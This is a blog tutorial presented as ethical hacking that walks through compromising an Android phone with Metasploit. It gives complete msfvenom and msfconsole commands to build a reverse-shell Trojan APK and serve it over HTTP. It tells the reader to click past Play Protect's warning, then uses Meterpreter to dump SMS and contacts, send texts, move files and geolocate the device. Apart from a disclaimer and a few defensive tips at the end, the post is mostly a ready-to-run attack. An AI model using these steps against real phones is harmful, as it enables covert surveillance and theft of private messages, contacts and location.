Ethical Hacking 101 - How Can You Hack Into An Android Device 📱 In 2022?

Raghav Mrituanjaya
• 4 min read

In this post we will see how a phone can be hacked in 2022 using the Metasploit Framework. The attack uses a Trojan APK generated with Metasploit's msfvenom and a listener run from msfconsole.

Disclaimer: This post only illustrates the attack and is for educational purposes; run it only against devices you own or are authorised to test.

What is Metasploit 🤔 ?

Metasploit is an open-source security project maintained and developed by Rapid7. It is a toolkit that helps an organisation's security team find and validate vulnerabilities in its systems and decide how to fix them. It comes pre-installed in Kali Linux. It ships with thousands of modules (exploits, auxiliary scanners, payloads, encoders and post-exploitation modules). Some of the important components are listed below.

  • Command shell payloads let you run collection scripts or arbitrary commands on the compromised host.
  • Meterpreter (the Metasploit Interpreter) is an in-memory payload that lets you browse, upload and download files, run commands, and, with the VNC payloads, view the screen; its Android build adds SMS, contacts, camera and location commands.
  • Dynamic payloads help evade anti-virus by generating a unique payload for every build.
  • Static payloads use a fixed IP address and port for the connection between the handler and the client system.

Installing Metasploit

  • Run the following commands to install Metasploit on your Linux server. The script must run as root, installs under /opt/metasploit-framework and pulls packages from Rapid7's repository, so read it before executing it:
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
chmod 755 msfinstall && \
./msfinstall
  • Metasploit is also available for other operating systems; see Rapid7's installation documentation for those.
  • If you are looking for a cloud server to test Metasploit on, consider Vultr.

Playing with Metasploit 😉

  • To find the public IP of our instance (a VM in the cloud) we run wget -qO - ipinfo.io, which returns output similar to this 👇
{
  "ip": "11.22.33.444",
  "hostname": "8.9.8.1.bc.googleusercontent.com",
  "city": "Singapore",
  "region": "Singapore",
  "country": "SG",
  "loc": "1.2897,103.8501",
  "org": "AS396982 Google LLC",
  "postal": "018989",
  "timezone": "Asia/Singapore",
  "readme": "https://ipinfo.io/missingauth"
}
  • The ip field in the JSON is the public IP of your instance (the value above is a redacted placeholder, not a real address).
  • If you are running on your local network instead, find the internal IP of your instance with ifconfig (or ip addr on newer distributions).
  • Before going further we need to build the Trojan APK, which msfvenom does in one command:
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.106.0.2 LPORT=4444 R > /var/www/html/payload.apk
  • -p selects the payload, here android/meterpreter/reverse_tcp: the app on the phone connects back to our listener.
  • LHOST is the address the phone will connect back to. Set it to the public IP of your instance, or its internal IP if the phone is on the same LAN.
  • LPORT is the port the listener accepts the connection on; keep the default 4444 or choose another.
  • R tells msfvenom to emit the raw payload, which for Android payloads is the built APK, and the shell redirect > writes it to the given path. The newer -o /var/www/html/payload.apk option does the same in one flag.
(screenshot: msfvenom output)
  • Change into the directory holding the APK (cd /var/www/html in my case) and run python3 -m http.server 1234 (python -m SimpleHTTPServer 1234 on Python 2) to spin up a temporary web server on port 1234.
  • Download the APK onto the phone by browsing to http://private_or_public_ip:1234/payload.apk
  • When you install it, Android asks you to allow installs from this source and Play Protect shows a warning like the one below; choose Install anyway.
(screenshot: Blocked by Play Protect)
  • Back on the instance, start Metasploit with msfconsole and run the following commands
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 1.1.1.1
set LPORT 4444
exploit
  • Change LHOST and LPORT to the values you baked into the APK. In the handler LHOST is the address to bind to: on a cloud VM whose public IP is NAT'd to the instance (the googleusercontent.com hostname above is such a case), that address is not on any local interface, so set LHOST 0.0.0.0 for the handler while keeping the public IP in the APK.
  • Now open the app on the phone; by default it is labelled MainActivity and shows an empty screen.
  • Back in the terminal a new Meterpreter session opens, giving you control of the device.
(screenshot: Meterpreter core commands)
  • The session includes commands for the device's file system, such as ls, download and upload.
  • Android-specific commands such as dump_sms, send_sms and dump_contacts read or send SMS messages and pull the contact list.
  • Run ? or help for the full list of commands.
  • The phone's current position comes from a single command, geolocate. On Android 6 and later these commands only work if the user granted the permissions the app requests on first launch (location, SMS, contacts and so on).

Tips to stay away from a Trojan attack ⚔

  • Do not install APKs from untrusted sources, and keep Play Protect enabled: the warning shown above is exactly what it is for.
  • In this post I generated a bare Trojan APK, but real attackers merge the payload into a legitimate app and trick you into installing that. If you would like to see how a Trojan is merged into another APK, let me know in the comments below.
  • Before installing an app from outside the store, check the permissions it requests (an app that wants SMS, contacts, location and camera access at once is a red flag) and, for open-source applications, examine the code.

P.S.: Vultr (get a $100 credit by registering with this link) is a good hosting choice if you are looking for one.

Thanks for reading till the end. Do let me know if you have any queries in the comment section below 😀

Tags: cyber-security, networking